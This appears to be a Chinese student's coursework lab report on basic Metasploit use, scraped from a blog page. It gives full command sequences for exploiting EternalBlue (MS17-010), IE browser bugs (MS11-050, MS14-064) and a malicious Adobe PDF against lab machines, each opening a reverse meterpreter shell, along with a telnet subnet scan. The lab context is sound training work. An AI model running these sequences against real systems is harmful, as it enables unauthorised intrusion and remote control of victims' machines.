2018-2019-2 20165319 《网络对抗技术》 Exp5:MSF基础应用
实验内容
metasploit中有六个模块分别是
渗透攻击模块(Exploit Modules)
辅助模块(Auxiliary Modules
攻击载荷(Payload Modules)
空字段模块(Nop Modules)
编码模块(Encoders)
后渗透攻击模块(Post)
本次实验使用的是exploit和auxiliary
基础题目
exploit就是通过一个小小的漏洞将自己的恶意代码植入目标主机从而达到攻击的目的,指的是一种攻击的手段
payload就相当于是一段恶意代码,或者说是一个装有恶意代码的容器,通过载荷就可以控制目标主机
encode是编码器,就是通过编码将恶意代码进行封装或伪装,使其不被目标主机检测为恶意软件
实验一 一个主动攻击实践(ms17—010)
靶机:windows2008server
(1)打开MSF输入nmap -O -Pn 192.168.1.126
利用auxiliary辅助模块进行扫描:
输入back退回,然后依次输入:
~
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set RHOST 192.168.1.126
exploit
~
实验二 对浏览器攻击时间(MS11-050/ms14-064)
1.MS11-050攻击(失败)
靶机:windows2008server
打开msf,输入
~
use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.1.126
set LPORT 5319
set URIPATH 5319gjt
exploit
~
结果失败了。
2.ms14-064(成功)
靶机:windowsXP
打开msf,输入下列指令:
~
use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 5319
set URIPATH gjt
exploit
~
然后将给出的链接复制以后,在靶机IE上打开,可以成功回连。
实验3 用adobe进行攻击(adobe_cooltype_sing)
打开msf,输入下列指令
~
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 5319
set FILENAME 20165319
exploit
~
创建出带有学号的pdf文件
将pdf复制到靶机上,靶机打开pdf。
输入下列指令:
~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 5319
exploit
~
攻击成功,kali回连。
实验4 辅助工具应用
运用了一个简单的扫描工具。
利用telnet来扫描
输入以下指令
~
use auxiliary/scanner/telnet/telnet_version 使用该模块
set RHOSTS 192.168.146.0/24 进行整个网段扫描
set THREADS 5319设置线程,这个数值可以自己定义
run
~
实验中遇到的问题
这次做浏览器攻击时,失败了大概7个漏洞,经查找资料发现,首先要改成tcp连接模式,其次,LHOST和SRVHOST的对象是kali攻击机而不是靶机。
另外对于不同的IE应该用不同的漏洞进行攻击。
实验体会
虽然经过这次实验成功实现了漏洞攻击,但是那是在靶机防火墙关闭,杀毒软件关闭的情况下,离实战应用还差很远。通过本次实验我再次意识到了网络的不安全性,一定要做好网络防卫工作。
2018-2019-2 20165319 《网络对抗技术》 Exp5:MSF基础应用的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- python3 动态import
有些情况下,需要动态的替换引入的包 1.常用的import方法 import platform import os 2.__import__ 动态引用 loop_manager = __import_ ...
- Angular记录(10)
文档资料 速查表:https://www.angular.cn/guide/cheatsheet 风格指南:https://www.angular.cn/guide/styleguide Angula ...
- 2018-2019-2 实验二 Java面向对象程序设计
实验内容 1.初步掌握单元测试和TDD 2.理解并掌握面向对象三要素:封装.继承.多态 3.初步掌握UML建模 4.熟悉S.O.L.I.D原则 5.了解设计模式 实验要求 1.没有Linux基础的同学 ...
- git使用方法收藏
基本的提交:https://www.cnblogs.com/jackchensir/p/8306448.html 菜鸟教程: http://www.runoob.com/git/git-basic-o ...
- java常见题目总结
编写多线程程序的几种方法:java5以前可以通过继承Thread类或者实现Runnable接口,重写run方法来定义线程行为:java5以后出现了另一种方式,实现Callable接口,该接口的call ...
- ccf 201712-4 行车路线(30分超时)
问题描述 小明和小芳出去乡村玩,小明负责开车,小芳来导航. 小芳将可能的道路分为大道和小道.大道比较好走,每走1公里小明会增加1的疲劳度.小道不好走,如果连续走小道,小明的疲劳值会快速增加,连续走s公 ...
- c语言编译四大步
-o: 指定生成后的文件名,后面跟指定的名称 四步:-E 预处理 > -S 编译 > -c 汇编 > 链接 -E: 表示预处理,生成文件为.i,会做宏(define)定义的展开.头文 ...
- vue项目中遇到的那些事。
前言 有好几天没更新文章了.这段实际忙着做了一个vue的项目,从 19 天前开始,到今天刚好 20 天,独立完成. 做vue项目做这个项目一方面能为工作做一些准备,一方面也精进一下技术. 技术栈:vu ...
- python爬虫得到unicode编码处理方式
在用python做爬虫的时候经常会与到结果中包含unicode编码,需要将结果转化为中文,处理方式如下 str.encode('utf-8').decode('unicode_escape')
- 用户态与内核态 & 文件流与文件描述符 简介【转】
转自:https://www.cnblogs.com/Jimmy1988/p/7479856.html 用户态和内核态 程序代码的依赖和调用关系如下图所示: Lib:标准ASCI C函数,几乎所有的平 ...